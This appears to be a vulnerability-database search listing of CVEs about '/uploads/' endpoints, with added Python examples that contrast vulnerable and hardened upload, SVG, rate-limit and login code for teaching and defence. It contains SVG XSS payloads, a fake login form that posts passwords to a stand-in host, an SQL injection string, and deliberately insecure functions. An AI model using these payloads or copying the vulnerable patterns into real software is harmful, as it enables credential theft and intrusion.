
19 matches found

Cvelist
added 2026/02/26 10:57 p.m. · 18 views

CVE-2026-28276 Initiative Allows Unauthenticated Access to Uploaded Documents via Public /uploads/ Endpoint

Initiative is a self-hosted project management platform. An access control vulnerability exists in Initiative versions prior to 0.32.2 where uploaded documents are served from a publicly accessible /uploads/ directory without any authentication or authorization checks. Any uploaded file can be...

CVSS 7.5 · EPSS 0.00152
Exploits 0 · References 2
OSV
added 2026/02/26 10:57 p.m. · 3 views

CVE-2026-28276 Initiative Allows Unauthenticated Access to Uploaded Documents via Public /uploads/ Endpoint

Initiative is a self-hosted project management platform. An access control vulnerability exists in Initiative versions prior to 0.32.2 where uploaded documents are served from a publicly accessible /uploads/ directory without any authentication or authorization checks. Any uploaded file can be...

CVSS 7.5 · AI score 5.6 · EPSS 0.00152
Exploits 0 · References 4
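
As an added example (not code from Initiative or from any of the databases listed here), the following contrasts mapping /uploads/ to a public static directory with a handler that resolves an opaque file id to its owning project and checks membership before reading anything from disk. The project ids, user names, file names and the temporary upload root are constructed for the demo.

```python
# Added example (not Initiative's code): serve uploaded documents only after an
# authorization check, instead of exposing /uploads/ as a public static directory.
# All project, user and file data below is constructed for the demo.
import tempfile
from dataclasses import dataclass
from pathlib import Path


@dataclass(frozen=True)
class Upload:
    file_id: str       # opaque id used in URLs, never the original filename
    project_id: str    # owning project; access is decided on its membership
    stored_name: str   # server-chosen name on disk


# Constructed sample data: project membership and upload ownership.
PROJECT_MEMBERS = {"proj-1": {"alice", "bob"}, "proj-2": {"carol"}}
UPLOADS = {
    "f1": Upload("f1", "proj-1", "a1b2.pdf"),
    "f2": Upload("f2", "proj-2", "c3d4.xlsx"),
}


def build_demo_root() -> Path:
    """Create a temporary upload root holding the two sample files."""
    root = Path(tempfile.mkdtemp(prefix="uploads-"))
    (root / "a1b2.pdf").write_bytes(b"spec")
    (root / "c3d4.xlsx").write_bytes(b"budget")
    return root


def serve_static_unauthenticated(upload_root: Path, name: str):
    """The vulnerable pattern: whoever knows (or guesses) the name gets the bytes."""
    path = upload_root / name
    if not path.is_file():
        return 404, b""
    return 200, path.read_bytes()


def serve_upload(user, file_id: str, upload_root: Path):
    """Hardened pattern: look the file up by opaque id, authorize the caller
    against the owning project, and only then touch the filesystem."""
    if user is None:
        return 401, b""                       # not logged in
    meta = UPLOADS.get(file_id)
    if meta is None:
        return 404, b""
    if user not in PROJECT_MEMBERS.get(meta.project_id, set()):
        return 403, b""                       # logged in, but not a member
    path = (upload_root / meta.stored_name).resolve()
    if upload_root.resolve() not in path.parents:
        return 404, b""                       # stored_name must stay inside the root
    if not path.is_file():
        return 404, b""
    return 200, path.read_bytes()
```

The file id in the URL is deliberately not the filename: it removes the guessing problem and any path-traversal surface in one step, and the ownership lookup is what turns "can reach the URL" into "is allowed to read this document".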
CVE
added 2026/02/06 7:23 p.m. · 9 views

CVE-2026-25642

CVE-2026-25642 affects HedgeDoc; prior to version 1.10.6, the security policy for files served under /uploads/ was insufficient, resulting in a too open Content-Security-Policy and enabling hosting of malicious interactive content (e.g., fake login forms) via SVG files. The issue is fixed in 1.10...

CVSS 6.1 · AI score 5.4 · EPSS 0.00043
Exploits 0 · References 4 · Affected Software 1
Positive Technologies
added 2026/02/06 12:00 a.m. · 2 views

PT-2026-6783

Name of the Vulnerable Software and Affected Versions: HedgeDoc versions prior to 1.10.6. Description: HedgeDoc is a real-time, collaborative, markdown notes application. Versions before 1.10.6 had a permissive Content-Security-Policy for files served under the /uploads/ endpoint. This allowed for t...

CVSS 4.3 · AI score 5.4 · EPSS 0.00043
Exploits 0 · References 9
RedhatCVE
added 2025/12/11 12:03 a.m. · 3 views

CVE-2025-63317

Todoist v8896 is vulnerable to Cross-Site Scripting (XSS) in /api/v1/uploads. Uploaded SVG files have no sanitization applied, so embedded JavaScript executes when a user opens the attachment from a task/comment...

CVSS 5.4 · AI score 6.1 · EPSS 0.00033
Exploits 1 · References 1
CVE
added 2025/12/01 12:00 a.m. · 6 views

CVE-2025-63317

Todoist v8896 is affected by an XSS vulnerability in the /api/v1/uploads endpoint. Uploaded SVG files are not sanitized, allowing embedded JavaScript to execute when a user opens the attachment from a task or comment. The Red Hat and EU/NVD entries corroborate Todoist v8896 as vulnerable to SVG-b...

CVSS 5.4 · AI score 5.8 · EPSS 0.00033
Exploits 1 · References 1 · Affected Software 1
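
The HedgeDoc entries above (permissive CSP on /uploads/, SVG used to host a fake login form) and the Todoist entries (unsanitized SVG executing JavaScript) are two sides of the same problem: an SVG is an XML document that browsers will script and render. As an added example, not code from HedgeDoc, Todoist or any listed database, the block below shows both defences a practitioner would combine: an inspection step that rejects SVGs carrying active content before they are stored, and the response headers that stop whatever is stored from running or rendering as an interactive page. The sample SVGs and the hostname in the fake form are constructed.

```python
# Added example (not HedgeDoc's or Todoist's code): two defences for user-uploaded SVG.
# 1) reject SVGs that carry active content before storing them;
# 2) serve stored uploads with headers that neutralise anything that slipped through.
# The sample SVGs at the bottom are constructed for the demo.
import xml.etree.ElementTree as ET

# Elements that execute code or embed arbitrary HTML (e.g. a login form).
ACTIVE_ELEMENTS = {"script", "foreignobject"}
# URL schemes that must not appear in href / xlink:href.
DANGEROUS_SCHEMES = ("javascript:", "vbscript:")


def _local(name: str) -> str:
    """Strip an XML namespace: '{http://www.w3.org/2000/svg}script' -> 'script'."""
    return name.rsplit("}", 1)[-1]


def svg_has_active_content(data: bytes) -> bool:
    """True if the SVG contains scripts, event-handler attributes, embedded HTML
    or script-scheme links. Unparseable input is treated as unsafe. (In
    production, parse with defusedxml so entity-expansion bombs are blocked too.)"""
    try:
        root = ET.fromstring(data)
    except ET.ParseError:
        return True
    for el in root.iter():
        if _local(el.tag).lower() in ACTIVE_ELEMENTS:
            return True
        for attr, value in el.attrib.items():
            name = _local(attr).lower()
            if name.startswith("on"):                       # onload, onclick, ...
                return True
            # Browsers ignore embedded tabs/newlines when parsing the scheme,
            # so strip whitespace before comparing ("java\nscript:" is live).
            if name == "href" and "".join(value.split()).lower().startswith(DANGEROUS_SCHEMES):
                return True
    return False


def upload_response_headers(filename: str, content_type: str) -> dict:
    """Headers for serving a stored upload. The CSP `sandbox` directive disables
    script execution and form submission even if active content got through;
    SVGs are additionally sent as attachments so they never render as a
    top-level document on the application's origin."""
    safe_name = "".join(c for c in filename if c.isalnum() or c in "._-") or "download"
    headers = {
        "Content-Type": content_type,
        "X-Content-Type-Options": "nosniff",
        "Content-Security-Policy": "default-src 'none'; style-src 'unsafe-inline'; sandbox",
    }
    disposition = "attachment" if content_type == "image/svg+xml" else "inline"
    headers["Content-Disposition"] = f'{disposition}; filename="{safe_name}"'
    return headers


# Constructed samples.
BENIGN_SVG = b'<svg xmlns="http://www.w3.org/2000/svg"><circle r="4" fill="red"/></svg>'
SCRIPT_SVG = b'<svg xmlns="http://www.w3.org/2000/svg"><script>alert(document.domain)</script></svg>'
ONLOAD_SVG = b'<svg xmlns="http://www.w3.org/2000/svg" onload="alert(1)"><rect width="1" height="1"/></svg>'
JS_HREF_SVG = (b'<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">'
               b'<a xlink:href="java&#10;script:alert(1)"><text>login</text></a></svg>')
FORM_SVG = (b'<svg xmlns="http://www.w3.org/2000/svg"><foreignObject width="200" height="100">'
            b'<form xmlns="http://www.w3.org/1999/xhtml" action="https://evil.example/steal">'
            b'<input name="password"/></form></foreignObject></svg>')
```

The inspection step is a filter and filters get bypassed; the headers are the control that holds regardless of file content, which is why the HedgeDoc fix was a CSP change rather than a parser change.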
EUVD
added 2025/11/11 12:30 a.m. · 3 views

EUVD-2025-50830

An authenticated arbitrary file upload vulnerability in the /uploads/ endpoint of CMS Made Simple Foundation File Manager v2.2.22 allows attackers with Administrator privileges to execute arbitrary code via uploading a crafted PHP file...

AI score 7.3 · EPSS 0.00099
Exploits 1 · References 2
NVD
added 2025/11/10 11:15 p.m. · 2 views

CVE-2025-63678

An authenticated arbitrary file upload vulnerability in the /uploads/ endpoint of CMS Made Simple Foundation File Manager v2.2.22 allows attackers with Administrator privileges to execute arbitrary code via uploading a crafted PHP file...

CVSS 7.2 · EPSS 0.00099
Exploits 1 · References 1
CVE
added 2025/11/10 12:00 a.m. · 7 views

CVE-2025-63678

Summary: CVE-2025-63678 affects CMS Made Simple Foundation File Manager v2.2.22. An authenticated attacker with Administrator privileges can upload a crafted PHP file to the /uploads/ endpoint, potentially leading to arbitrary code execution. This aligns with multiple sources in the connected doc...

CVSS 7.2 · AI score 7.4 · EPSS 0.00099
Exploits 1 · References 1 · Affected Software 1
Cvelist
added 2025/11/10 12:00 a.m. · 4 views

CVE-2025-63678

An authenticated arbitrary file upload vulnerability in the /uploads/ endpoint of CMS Made Simple Foundation File Manager v2.2.22 allows attackers with Administrator privileges to execute arbitrary code via uploading a crafted PHP file...

EPSS 0.00099
Exploits 1 · References 1
CNNVD
added 2025/11/10 12:00 a.m. · 1 views

CMSmadesimple security vulnerability

CMSmadesimple is an open source content management system from the CMS Made Simple Foundation. A security vulnerability exists in CMSmadesimple version 2.2.22, which originates from the presence of an authenticated, arbitrary file upload in the /uploads/ endpoint and could lead to the execution o...

CVSS 7.2 · AI score 7 · EPSS 0.00099
Exploits 1 · References 2
OSV
added 2024/04/01 2:04 p.m. · 29 views

BIT-DISCOURSE-2024-24827 No rate limits on POST /uploads endpoint in Discourse

Discourse is an open source platform for community discussion. Without a rate limit on the POST /uploads endpoint, it makes it easier for an attacker to carry out a DoS attack on the server since creating an upload can be a resource intensive process. Do note that the impact varies from site to...

CVSS 7.5 · AI score 5.2 · EPSS 0.00063
Exploits 0 · References 3
NVD
added 2024/03/15 8:15 p.m. · 14 views

CVE-2024-24827

Discourse is an open source platform for community discussion. Without a rate limit on the POST /uploads endpoint, it makes it easier for an attacker to carry out a DoS attack on the server since creating an upload can be a resource intensive process. Do note that the impact varies from site to...

CVSS 7.5 · AI score 5.1 · EPSS 0.00063
Exploits 0 · References 2
Vulnrichment
added 2024/03/15 7:13 p.m. · 25 views

CVE-2024-24827 No rate limits on POST /uploads endpoint in Discourse

Discourse is an open source platform for community discussion. Without a rate limit on the POST /uploads endpoint, it makes it easier for an attacker to carry out a DoS attack on the server since creating an upload can be a resource intensive process. Do note that the impact varies from site to...

CVSS 5.3 · AI score 5.5 · EPSS 0.00063
Exploits 0 · References 2
Cvelist
added 2024/03/15 7:13 p.m. · 14 views

CVE-2024-24827 No rate limits on POST /uploads endpoint in Discourse

Discourse is an open source platform for community discussion. Without a rate limit on the POST /uploads endpoint, it makes it easier for an attacker to carry out a DoS attack on the server since creating an upload can be a resource intensive process. Do note that the impact varies from site to...

CVSS 5.3 · AI score 5.4 · EPSS 0.00063
Exploits 0 · References 2
CNNVD
added 2024/03/15 12:00 a.m. · 2 views

Discourse security vulnerability

Discourse is an open source community discussion platform. The platform includes features such as community, email and chat rooms. Discourse suffers from a denial of service vulnerability that stems from the POST /uploads endpoint not being rate-limited. An attacker could exploit this vulnerabili...

CVSS 7.5 · AI score 6.6 · EPSS 0.00063
Exploits 0 · References 4
Positive Technologies
added 2024/03/15 12:00 a.m. · 2 views

PT-2024-20593 · Nginx +1

Name of the Vulnerable Software and Affected Versions: Discourse versions prior to the latest stable, beta and tests-passed version Description: The issue affects Discourse, an open source platform for community discussion, due to the lack of a rate limit on the "POST /uploads" endpoint. This mak...

CVSS 5.3 · AI score 6.7 · EPSS 0.00063
Exploits 0 · References 6
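
The Discourse entries above all describe the same weakness: an upload is expensive to process, so an endpoint that accepts unlimited uploads per client is a denial-of-service lever. As an added example, not Discourse's code, the block below puts a per-principal token bucket in front of a stand-in upload handler, charging more tokens for larger files and returning 429 with a Retry-After hint when the bucket is empty. The limits, the cost formula and the fake clock are constructed for the demo.

```python
# Added example (not Discourse's code): a per-principal token bucket in front of
# an upload endpoint. Limits and the per-MiB cost are illustrative; the clock is
# injectable so the behaviour can be exercised without sleeping.
import math
import time


class UploadRateLimiter:
    """Token bucket per key (user id or client IP). `capacity` is the burst an
    idle client may spend at once; `refill_per_sec` (> 0) is the sustained rate."""

    def __init__(self, capacity: float, refill_per_sec: float, clock=time.monotonic):
        self.capacity = float(capacity)
        self.refill = float(refill_per_sec)
        self.clock = clock
        self._buckets = {}   # key -> [tokens, last_refill_time]

    def _refill(self, key: str) -> float:
        now = self.clock()
        tokens, last = self._buckets.get(key, (self.capacity, now))
        tokens = min(self.capacity, tokens + (now - last) * self.refill)
        self._buckets[key] = [tokens, now]
        return tokens

    def try_acquire(self, key: str, cost: float = 1.0):
        """Spend `cost` tokens if available. Returns (allowed, retry_after_seconds)."""
        tokens = self._refill(key)
        if tokens >= cost:
            self._buckets[key][0] = tokens - cost
            return True, 0
        return False, math.ceil((cost - tokens) / self.refill)


def handle_upload(limiter: UploadRateLimiter, key: str, size_bytes: int):
    """Stand-in upload handler: larger files cost more tokens, because the
    work that follows an upload (thumbnailing, scanning, ...) scales with size."""
    cost = 1.0 + size_bytes / (1024 * 1024)   # 1 token + 1 per MiB
    allowed, retry_after = limiter.try_acquire(key, cost)
    if not allowed:
        return 429, {"Retry-After": str(retry_after)}
    return 200, {}


class FakeClock:
    """Constructed clock for the demo: time only moves when advance() is called."""

    def __init__(self):
        self.now = 0.0

    def __call__(self) -> float:
        return self.now

    def advance(self, seconds: float) -> None:
        self.now += seconds
```

Keying on the authenticated user rather than only the IP matters for a forum: many legitimate users share a NAT, while one account hammering the endpoint is exactly the case to stop.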
Positive Technologies
added 2018/11/21 12:00 a.m. · 2 views

PT-2018-14956 · Subrion · Subrion Cms

Name of the Vulnerable Software and Affected Versions: Subrion CMS version 4.2.1 Description: The issue allows remote attackers to execute arbitrary PHP code via a .pht or .phar file. This is because the .htaccess file omits these file types, specifically affecting the /panel/uploads endpoint...

CVSS 7.2 · AI score 7.5 · EPSS 0.84263
Exploits 10 · References 13
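
The CMS Made Simple entries above (an administrator uploading a crafted PHP file to /uploads/) and the Subrion entry (an .htaccess that lists some PHP extensions but not .pht or .phar) are the same class of failure: deciding what may be uploaded by listing what is forbidden. As an added example, not code from either project, the block below contrasts that denylist pattern with an allowlist that also checks the file's leading bytes and stores the file under a server-generated name. The denylist contents are illustrative, not the actual Subrion .htaccess.

```python
# Added example (not CMS Made Simple's or Subrion's code). Contrasts an
# extension denylist (the pattern an incomplete .htaccess implements) with an
# allowlist, a content check, and a server-generated stored name.
# The DENYLIST below is illustrative, not the real Subrion .htaccess contents.
import secrets

# Illustrative denylist: common PHP extensions, but not .pht or .phar.
DENYLIST = {"php", "php3", "php4", "php5", "phtml"}

# Allowlist: extension -> magic bytes the file must start with.
ALLOWLIST = {
    "jpg": b"\xff\xd8\xff",
    "png": b"\x89PNG\r\n\x1a\n",
    "gif": b"GIF8",
    "pdf": b"%PDF-",
}


def _extension(filename: str) -> str:
    return filename.rsplit(".", 1)[-1].lower() if "." in filename else ""


def denylist_allows(filename: str) -> bool:
    """Vulnerable check: accept anything whose last extension is not on the list.
    Every extension the list forgets (.pht, .phar, ...) is an upload of executable code."""
    return _extension(filename) not in DENYLIST


def stored_name_for(filename: str, data: bytes):
    """Hardened check: the extension must be allowlisted, the bytes must match
    that type, and the file is stored under a random name so the original
    filename (e.g. 'shell.php.jpg') never reaches the filesystem.
    Returns the name to store under, or None to reject."""
    ext = _extension(filename)
    magic = ALLOWLIST.get(ext)
    if magic is None or not data.startswith(magic):
        return None
    return f"{secrets.token_hex(16)}.{ext}"
```

The content check only catches the obvious case (a PHP script with a .jpg name); a real JPEG with PHP in a comment segment passes it. The control that holds regardless is the web server configuration: the directory uploads are written to must be served by a location with no script handler, so that any filter bypass yields a download rather than code execution.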
Positive Technologies
added 2018/09/04 12:00 a.m. · 1 views

PT-2018-13566 · Bluecms · Bluecms

Name of the Vulnerable Software and Affected Versions: BlueCMS version 1.6 Description: The issue allows SQL Injection via the user name parameter to the "uploads/user.php?act=index login" endpoint. Recommendations: For BlueCMS version 1.6, avoid using the user name parameter in the affected...

CVSS 9.8 · AI score 9.6 · EPSS 0.0025
Exploits 1 · References 2
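
The BlueCMS entry above describes SQL injection through the user name field of a login form. As an added example, not BlueCMS's code, the block below writes the same login lookup twice against an in-memory SQLite database: once with the user name concatenated into the SQL, so a crafted user name rewrites the WHERE clause, and once parameterised, with the password compared outside the query. The users and hashes are constructed; SHA-256 is used only for brevity, a real system would use a slow salted hash such as argon2 or bcrypt.

```python
# Added example (not BlueCMS's code): the same login lookup written with string
# concatenation (injectable) and with a parameterised query. Users are constructed;
# SHA-256 stands in for a proper password hash to keep the example short.
import hashlib
import hmac
import sqlite3


def _h(pw: str) -> str:
    return hashlib.sha256(pw.encode()).hexdigest()


def make_db() -> sqlite3.Connection:
    """In-memory database with two constructed accounts."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT PRIMARY KEY, password_hash TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?)",
        [("admin", _h("correct horse battery staple")), ("guest", _h("guest"))],
    )
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str):
    """Builds the WHERE clause from user input. A user name such as
    "admin' --" comments out the password condition entirely."""
    sql = (f"SELECT username FROM users WHERE username = '{username}' "
           f"AND password_hash = '{_h(password)}'")
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(conn: sqlite3.Connection, username: str, password: str):
    """Parameterised lookup; the driver sends the user name as data, not SQL,
    and the password never enters the query at all."""
    row = conn.execute(
        "SELECT username, password_hash FROM users WHERE username = ?", (username,)
    ).fetchone()
    if row is None:
        return None
    return row[0] if hmac.compare_digest(row[1], _h(password)) else None
```

Note that the safe version also stops fetching rows by password: the comparison happens in application code with a constant-time compare, so the query shape no longer depends on anything the client controls.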